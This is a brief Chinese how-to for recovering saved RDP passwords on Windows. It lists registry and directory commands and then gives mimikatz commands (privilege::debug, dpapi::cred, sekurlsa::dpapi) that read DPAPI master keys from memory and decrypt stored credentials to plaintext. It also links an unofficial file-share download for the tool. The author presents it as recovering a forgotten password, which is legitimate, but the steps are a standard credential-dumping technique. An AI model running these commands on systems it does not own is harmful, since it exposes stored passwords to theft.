1、查詢試用遠程桌面連接過的信息
reg query "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /s
2、獲取憑證目錄保存信息
dir /a %userprofile%\AppData\Local\Microsoft\Credentials\*
上面兩步是在cmd中運行的 只求結果的話第一步可以忽略
下面是提取密碼的重點部分,提取之前請先下載工具https://hjyrobot.lanzouw.com/iJHspzai1fe
3、下載之后解壓,我用的x64的,記重點一定要用管理員身份打開mimikatz.exe
4、選擇一個密碼文件對其進行解密。此處需要記錄下guidMasterKey的值,待會要通過guidMasterKey找對應的Masterkey。
mimikatz # privilege::debug mimikatz # dpapi::cred /in:C:\Users\Administrator\AppData\Local\Microsoft\Credentials\989D64B39BE25725073053118EA4E7EE
5、根據guidMasterKey找到對應的Masterkey。
mimikatz # sekurlsa::dpapi
6、通過Masterkey解密出明文RDP連接密碼。
mimikatz # dpapi::cred /in:C:\Users\Administrator\AppData\Local\Microsoft\Credentials\989D64B39BE25725073053118EA4E7EE /masterkey:bef9810fd9548bf9377d6deb49a4a985482ac9522c1974ed5d07bdefeb6c6d39db19b97aa9986af68abd908928a1c1cd6d531aa7a14e11624af7d7078e1fd62e
7、頁面不關閉的清空下,繼續發送請求可以提取其他RDP的密碼,只用改下面藍色部分即可(藍色部分來自第2步)
mimikatz # dpapi::cred /in:C:\Users\Administrator\AppData\Local\Microsoft\Credentials\C1F31A12075F5DC62238288994233498
至此就已經完畢了,我這邊主要是忘記RDP密碼的提取,瀏覽器的密碼重復上面步驟即可
